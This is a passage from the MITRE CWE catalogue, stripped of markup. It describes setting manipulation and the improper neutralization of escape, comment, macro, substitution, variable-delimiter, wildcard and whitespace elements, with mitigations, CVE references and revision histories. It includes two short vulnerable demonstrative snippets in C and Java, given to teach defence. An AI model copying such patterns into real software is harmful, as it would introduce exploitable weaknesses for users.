flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + Architecture and Design + Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control. + + + Implementation + Architecture and Design + In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker. + + + + + The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine. + + ...sethostid(argv[1]);... + + Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior. + + + The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection. + + ...conn.setCatalog(request.getParameter("catalog"));... + + In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database. + + + + + Setting Manipulation + + + SFP25 + Tainted input to variable + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Setting Manipulation + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0542 + The mail program processes special "~" escape sequence even when not in interactive mode. + https://www.cve.org/CVERecord?id=CVE-2002-0542 + + + CVE-2000-0703 + Setuid program does not filter escape sequences before calling mail program. + https://www.cve.org/CVERecord?id=CVE-2000-0703 + + + CVE-2002-0986 + Mail function does not filter control characters from arguments, allowing mail message content to be modified. + https://www.cve.org/CVERecord?id=CVE-2002-0986 + + + CVE-2003-0020 + Multi-channel issue. Terminal escape sequences not filtered from log files. + https://www.cve.org/CVERecord?id=CVE-2003-0020 + + + CVE-2003-0083 + Multi-channel issue. Terminal escape sequences not filtered from log files. + https://www.cve.org/CVERecord?id=CVE-2003-0083 + + + CVE-2003-0021 + Terminal escape sequences not filtered by terminals when displaying files. + https://www.cve.org/CVERecord?id=CVE-2003-0021 + + + CVE-2003-0022 + Terminal escape sequences not filtered by terminals when displaying files. + https://www.cve.org/CVERecord?id=CVE-2003-0022 + + + CVE-2003-0023 + Terminal escape sequences not filtered by terminals when displaying files. + https://www.cve.org/CVERecord?id=CVE-2003-0023 + + + CVE-2003-0063 + Terminal escape sequences not filtered by terminals when displaying files. + https://www.cve.org/CVERecord?id=CVE-2003-0063 + + + CVE-2000-0476 + Terminal escape sequences not filtered by terminals when displaying files. + https://www.cve.org/CVERecord?id=CVE-2000-0476 + + + CVE-2001-1556 + MFV. (multi-channel). Injection of control characters into log files that allow information hiding when using raw Unix programs to read the files. + https://www.cve.org/CVERecord?id=CVE-2001-1556 + + + + + Escape, Meta, or Control Character / Sequence + + + IDS03-J + Do not log unsanitized user input + + + SFP24 + Tainted input to command + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Escape, Meta, or Control Character / Sequence + Failure to Remove Escape, Meta, or Control Character / Sequence + Failure to Sanitize Escape, Meta, or Control Sequences + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that comments will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0001 + Mail client command execution due to improperly terminated comment in address list. + https://www.cve.org/CVERecord?id=CVE-2002-0001 + + + CVE-2004-0162 + MIE. RFC822 comment fields may be processed as other fields by clients. + https://www.cve.org/CVERecord?id=CVE-2004-0162 + + + CVE-2004-1686 + Well-placed comment bypasses security warning. + https://www.cve.org/CVERecord?id=CVE-2004-1686 + + + CVE-2005-1909 + Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow ">!--" while denying most other tags. + https://www.cve.org/CVERecord?id=CVE-2005-1909 + + + CVE-2005-1969 + Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow "<!--" while denying most other tags. + https://www.cve.org/CVERecord?id=CVE-2005-1969 + + + + + Comment Element + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Comment Element + Failure to Remove Comment Element + Failure to Sanitize Comment Element + Improper Sanitization of Comment Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + Input Validation + Developers should anticipate that macro symbols will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0770 + Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. + https://www.cve.org/CVERecord?id=CVE-2002-0770 + + + CVE-2008-2018 + Attacker can obtain sensitive information from a database by using a comment containing a macro, which inserts the data during expansion. + https://www.cve.org/CVERecord?id=CVE-2008-2018 + + + + + Macro Symbol + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Macro Symbol + Failure to Remove Macro Symbol + Failure to Sanitize Macro Symbol + Improper Sanitization of Macro Symbols + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that substitution characters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0770 + Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. + https://www.cve.org/CVERecord?id=CVE-2002-0770 + + + + + Substitution Character + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Substitution Character + Failure to Remove Substitution Character + Failure to Sanitize Substitution Character + Improper Sanitization of Substitution Characters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component. + As data is parsed, an injected delimiter may cause the process to take unexpected actions that result in an attack. Example: "$" for an environment variable. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that variable name delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2005-0129 + "%" variable is expanded by wildcard function into disallowed commands. + https://www.cve.org/CVERecord?id=CVE-2005-0129 + + + CVE-2002-0770 + Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. + https://www.cve.org/CVERecord?id=CVE-2002-0770 + + + + + Variable Name Delimiter + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Variable Name Delimiter + Failure to Remove Variable Name Delimiter + Failure to Sanitize Variable Name Delimiter + Improper Sanitization of Variable Name Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component. + As data is parsed, an injected element may cause the process to take unexpected actions. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that wildcard or matching elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0433 + Bypass file restrictions using wildcard character. + https://www.cve.org/CVERecord?id=CVE-2002-0433 + + + CVE-2002-1010 + Bypass file restrictions using wildcard character. + https://www.cve.org/CVERecord?id=CVE-2002-1010 + + + CVE-2001-0334 + Wildcards generate long string on expansion. + https://www.cve.org/CVERecord?id=CVE-2001-0334 + + + CVE-2004-1962 + SQL injection involving "/**/" sequences. + https://www.cve.org/CVERecord?id=CVE-2004-1962 + + + + + Wildcard or Matching Element + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Wildcard or Matching Element + Failure to Remove Wildcard or Matching Element + Failure to Sanitize Wildcard or Matching Symbol + Improper Sanitization of Wildcards or Matching Symbols + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component. + This can include space, tab, etc. + + + + + + + + + White space + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that whitespace will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be 